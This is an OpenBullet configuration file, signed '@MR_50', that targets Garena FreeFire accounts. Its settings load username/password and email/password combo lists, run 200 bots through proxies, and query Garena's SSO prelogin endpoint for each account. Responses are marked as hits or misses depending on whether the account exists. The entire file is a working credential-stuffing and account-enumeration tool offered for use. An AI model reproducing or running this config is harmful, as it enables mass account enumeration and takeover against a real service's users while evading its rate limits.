[SETTINGS]
{
  "Name": "Garena FreeFire",
  "SuggestedBots": 200,
  "MaxCPM": 0,
  "LastModified": "2021-04-01T09:24:35.3358466+00:00",
  "AdditionalInfo": "",
  "Author": "@MR_50",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": true,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "UserPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://sso.garena.com/api/prelogin?account=<USER>&format=json&id=1615395766290&app_id=10100" 
  
  HEADER "Host: sso.garena.com" 
  HEADER "Referer: https://sso.garena.com/ui/login?app_id=10100&redirect_uri=https%3A%2F%2Faccount.garena.com%2F%3Flocale_name%3DSG&locale=en-SG" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "\"error\": \"error_no_account\"}" 
    KEY "\"error\": \"error_params\"}" 
  KEYCHAIN Success OR 
    KEY "\"account\"" 
    KEY "{\"v1\"" 
    KEY "\"v2\"" 

FUNCTION Constant "@MR_50" -> CAP "Config By :" 

